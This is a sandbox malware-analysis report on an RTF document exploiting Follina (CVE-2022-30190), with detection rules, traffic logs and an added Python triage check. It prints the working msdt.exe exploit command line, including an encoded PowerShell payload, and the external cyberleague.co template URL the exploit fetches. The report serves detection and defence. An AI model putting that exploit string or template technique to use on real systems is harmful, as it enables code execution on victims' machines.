
Windows Analysis Report
20220531_180800.rtf

Overview

General Information

Sample Name: 20220531_180800.rtf
Analysis ID: 639039
MD5: 7b9c8e08371550238fbcd7cee1c8087d
SHA1: ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256: b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Detected suspicious Microsoft Office reference URL
Obfuscated document found, RTF is a DOCX
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7100 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup
No configs have been found
Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190
Author: Tobias Michalski, Christian Burkard, Wojciech Cieślak
Strings:
  • 0x39:$a1: <Relationships
  • 0x3b9:$a2: TargetMode="External"
  • 0x3b1:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b9:$mode: TargetMode="External
Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm
Rule: MAL_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x113c:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm
Rule: MAL_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x113c:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm
Rule: MAL_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x113c:$re1: location.href = "ms-msdt:
Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • $sa1: msdt.exe at 0x1c84, 0x1cc0, 0x2188, 0x38b5
  • $sb2: IT_BrowseForFile= at 0x1d98, 0x3921

Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • $sa1: msdt.exe at 0x2890
  • $sb2: IT_BrowseForFile= at 0x2964

Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • $sa1: msdt.exe at 0x22d0, 0x230c, 0x27d4
  • $sb2: IT_BrowseForFile= at 0x23e4

Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • $sa1: msdt.exe at 0x2618, 0x60a8, 0x18c06
  • $sb2: IT_BrowseForFile= at 0x16c28

Source: Process Memory Space: msdt.exe PID: 7100
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • $sa1: msdt.exe at 0xccd, 0x32ec, 0x488e, 0x8d4c, 0xbd02, 0x12fd5, 0x12ff2, 0x13255, 0x139b6, 0x14d9a, 0x14db7, 0x14ddb, 0x14dfb, 0x14e70, 0x1c10e, 0x1f0c4, 0x22589, 0x24ae4, 0x27a9a, 0x2af61, 0x2f9c8

No Sigma rule has matched
No Snort rule has matched


Exploits

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED
Source: document.xml.rels; Extracted files from sample: https://cyberleague.co/th1s.html!
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown; HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic; TCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
Source: global traffic; DNS query: name: cyberleague.co
Source: global traffic; TCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
Source: global traffic; HTTP traffic detected:
  GET /th1s.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: cyberleague.co
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /th1s.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: cyberleague.co
  If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
  If-None-Match: "13e4-5e063d0e1ca1e"
  Connection: Keep-Alive
Source: Joe Sandbox View; ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View; JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown; Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown; Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown; Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49746
Source: ~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp.0.dr; String found in binary or memory: https://cyberleague.co/th1s.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://roaming.edog.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://settings.outlook.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://tasks.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknown | DNS traffic detected: queries for: cyberleague.co
        Source: global traffic | HTTP traffic detected:
          GET /th1s.html HTTP/1.1
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
          Accept-Encoding: gzip, deflate
          Host: cyberleague.co
          Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected (conditional re-fetch of the same resource, see the If-Modified-Since and If-None-Match headers):
          GET /th1s.html HTTP/1.1
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
          Accept-Encoding: gzip, deflate
          Host: cyberleague.co
          If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
          If-None-Match: "13e4-5e063d0e1ca1e"
          Connection: Keep-Alive
        Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2
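        Added example (not part of the Joe Sandbox report): a Python triage check over the two HTTP requests recorded above, reconstructed as well-formed requests with their CRLF line breaks restored. It flags a request when the User-Agent carries the Office token (ms-office; MSOffice 16) but the Host lies outside a Microsoft-operated suffix and the path names an HTML page, which is what Word fetching an external relationship target looks like on the wire. The Microsoft suffix allow-list is an assumption made for illustration and must be tuned per environment; the second request is recognised as a conditional re-fetch from its If-None-Match and If-Modified-Since headers.

```python
"""Flag Office-originated HTTP fetches of HTML from non-Microsoft hosts.

Added example, not code from the Joe Sandbox report. The request texts below
are reconstructed from the report's two HTTP lines (constructed input); the
allow-list of Microsoft suffixes is an assumption for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed: the report's two requests with CRLF header breaks restored.
OBSERVED_REQUESTS: List[str] = [
    "GET /th1s.html HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; "
    "ms-office; MSOffice 16)\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: cyberleague.co\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /th1s.html HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; "
    "ms-office; MSOffice 16)\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: cyberleague.co\r\n"
    "If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT\r\n"
    'If-None-Match: "13e4-5e063d0e1ca1e"\r\n'
    "Connection: Keep-Alive\r\n\r\n",
]

# Assumption: hosts under these suffixes are treated as Microsoft-operated.
MICROSOFT_SUFFIXES = ("office.com", "office.net", "office365.com", "live.com",
                      "live.net", "microsoft.com", "msedge.net", "windows.net")


@dataclass
class RequestVerdict:
    host: str
    path: str
    office_client: bool   # User-Agent carries the Office token
    microsoft_host: bool  # Host is under an allow-listed Microsoft suffix
    revalidation: bool    # conditional GET (If-None-Match / If-Modified-Since)
    fetches_html: bool    # requested resource looks like an HTML page

    @property
    def suspicious(self) -> bool:
        # Office pulling an HTML page from a host Microsoft does not operate.
        return self.office_client and not self.microsoft_host and self.fetches_html


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP/1.1 request head into method, path and lower-cased headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    fields = {"method": method, "path": path}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        fields[name.strip().lower()] = value.strip()
    return fields


def classify(raw: str) -> RequestVerdict:
    """Derive the indicators used for the verdict from one request."""
    h = parse_request(raw)
    host = h.get("host", "").lower()
    ua = h.get("user-agent", "").lower()
    return RequestVerdict(
        host=host,
        path=h["path"],
        office_client="ms-office" in ua,
        microsoft_host=any(host == s or host.endswith("." + s) for s in MICROSOFT_SUFFIXES),
        revalidation="if-none-match" in h or "if-modified-since" in h,
        fetches_html=bool(re.search(r"\.html?($|\?)", h["path"], re.I)),
    )


if __name__ == "__main__":
    for raw in OBSERVED_REQUESTS:
        v = classify(raw)
        print(f"{v.host}{v.path} office_client={v.office_client} "
              f"revalidation={v.revalidation} suspicious={v.suspicious}")
```

Run against a proxy log, the same check also exposes the two-step pattern visible here: the first fetch followed by a conditional re-fetch of the same HTML, which is Word re-loading the external target.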

        System Summary

        Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents Author: ditekSHen
        Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieślak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
        Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 7100, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: 20220531_180800.rtf.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\20220531_180800.rtf
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{76F41A02-472B-4714-A15B-4E9746E42478} - OProcSessId.dat
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
        Source: classification engine | Classification label: mal72.expl.evad.winRTF@5/15@2/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next (reported 30 times)
        Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
